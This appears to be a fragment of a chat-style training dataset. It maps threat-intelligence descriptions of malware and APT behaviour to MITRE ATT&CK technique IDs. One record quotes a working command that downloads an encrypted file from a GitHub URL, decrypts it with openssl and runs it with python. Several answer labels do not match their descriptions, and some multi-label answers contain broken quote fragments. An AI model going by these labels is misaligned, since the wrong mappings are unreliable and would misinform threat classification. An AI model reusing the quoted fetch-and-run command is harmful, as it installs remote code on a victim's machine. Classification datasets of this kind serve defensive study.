- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name “remote overlay”) designed to appear like they are part of the bank’s website. These pages can either block the victim’s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out"
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has used a fast flux DNS for C2 IP resolution."
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers."
- },
- {
- "role": "assistant",
- "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used batch scripts to download tools and executing cryptocurrency miners."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JSS Loader has the ability to launch scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our analysis of the backdoors used in the September 2018 attacks show that AuditCred.dll/ROptimizer.dll was similarly used: FileTokenBroker.dll (2017 attack) AuditCred.dll/Roptimizer.dll (2018 attack) Launch Method Service Service Function Loader Component Loader Component Working directory %Windows%\\System32 %Windows%\\System32 Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado Loaded Component Blending Blends with .mui files Blend with ActiveX data Object dll files Table1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components: AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) – loader DLL that is launched as a service Msadoz.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) – encrypted backdoor n = number of characters in the loader dll’s filename Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) – encrypted configuration file Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has the ability to steal saved passwords from Microsoft Outlook."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro v2.0 has another new function. If a dialog title is “Internet Explorer [7-11]” (the number after “Internet Explorer” depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends WM_CLOSE message to close the dialog"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Winnti for Windows HTTP/S C2 mode can make use of an external proxy."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vasport is capable of tunneling though a proxy."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After initial compromise, will download a second stage to establish a more permanent presence on the affected system."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBALL has the ability to use FTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute ipconfig on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses SSL/TLS and RC4 to encrypt traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy gets the username from the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use \"sudo\" to run a command."
- },
- {
- "role": "assistant",
- "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy identifies network drives when they are added to victim systems."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides many of its backdoor payloads in an alternate data stream (ADS)."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of executes dir C:\\progra~1 when initially run."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In an uninhibited Emotet infection, it’s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some good analyses of Emotet if you’re looking for further reading"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the Plink utility to create SSH tunnels."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth web shell command set"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = “UserCache.dll“) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = “UserCache.dll“) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has decrypted encrypted strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\""
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during intrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass Windows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes, and for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return S_OK. The technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both 32bit and 64bit variants of BOATLAUNCH have been observed using the following export directory DLL names."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has renamed malware to legitimate names such as \"ESTCommon.dll\" or \"patch.dll\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used tools to identify if a mouse is connected to a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2. However, I was still able to analyze the network traffic of the sample. How, you might ask? Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address. I then opened a listener on my own IP on the respective port. [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware. The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark. After I’d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent. Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample. A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample. [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively. “Hitting between the heartbeats” When sending commands, first the sample must login in with 0x65, then you can send commands to it. However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command. A proof of concept of the command script can be found here , while the Implant extraction script and the Command Script will be included in the Appendix"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST collected the username from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ecipekac has used a valid, legitimate digital signature to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then calls the API EnumWindows() function to enumerate all windows from the victim’s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: “{14H long random string}+windows title”. All the mixed windows titles are added into a string list box control"
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has commonly set file and path attributes to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can collect system information including the OS version and domain on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\""
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has used a hardcoded GitHub repository as a fallback channel."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root."
- },
- {
- "role": "assistant",
- "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has harvested user's login credentials."
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "New services created by are made to appear like legitimate Windows services, with names such as \"Windows Management Help Service\", \"Microsoft Support\", and \"Windows Advanced Task Manager\"."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TAINTEDSCRIBE command and execution module can perform target system enumeration."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can execute command line scripts received from C2."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can decode contents from a payload that was Base64 encoded and write the contents to a file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uploads data in 2048-byte chunks."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk can stop specific services related to backups."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
